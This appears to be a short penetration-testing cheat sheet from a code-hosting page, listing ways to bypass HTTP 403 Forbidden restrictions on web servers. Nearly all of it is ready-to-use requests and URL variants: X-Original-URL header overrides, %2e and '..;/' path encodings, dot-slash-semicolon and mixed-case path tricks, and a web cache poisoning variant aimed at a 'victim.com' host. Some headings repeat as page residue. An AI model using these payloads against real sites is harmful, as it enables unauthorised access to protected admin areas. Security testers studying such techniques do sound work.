Bypass 403 (Forbidden)

Using `X-Original-URL` header

# Normal Request (403)
GET /admin HTTP/1.1
Host: target.com

# Try this to bypass (200)
GET /anything HTTP/1.1
Host: target.com
X-Original-URL: /admin

Appending `%2e` after the first slash

# Normal Request (403)
http://target.com/admin

# Try this to bypass (200)
http://target.com/%2e/admin

Try add dot `.` slash `/` and semicolon `;` in the URL

# Normal Request (403)
http://target.com/admin

# Try this to bypass (200)
http://target.com/secret/.
http://target.com//secret//
http://target.com/./secret/..
http://target.com/;/secret
http://target.com/.;/secret
http://target.com//;//secret

Add `..;/` after the directory name

# Normal Request (403)
http://target.com/admin

# Try this to bypass (200)
http://target.com/admin..;/

Try to uppercase the alphabet in the url

# Normal Request (403)
http://target.com/admin

# Try this to bypass (200)
http://target.com/aDmIN

Via Web Cache Poisoning

GET /anything HTTP/1.1
Host: victim.com
X-Original-URL: /admin

1.1 KiB Raw Permalink Blame History Unescape Escape

Bypass 403 (Forbidden)

Using X-Original-URL header

Appending %2e after the first slash

Try add dot . slash / and semicolon ; in the URL

Add ..;/ after the directory name

Try to uppercase the alphabet in the url

Via Web Cache Poisoning

1.1 KiB

Raw Permalink Blame History

Using `X-Original-URL` header

Appending `%2e` after the first slash

Try add dot `.` slash `/` and semicolon `;` in the URL

Add `..;/` after the directory name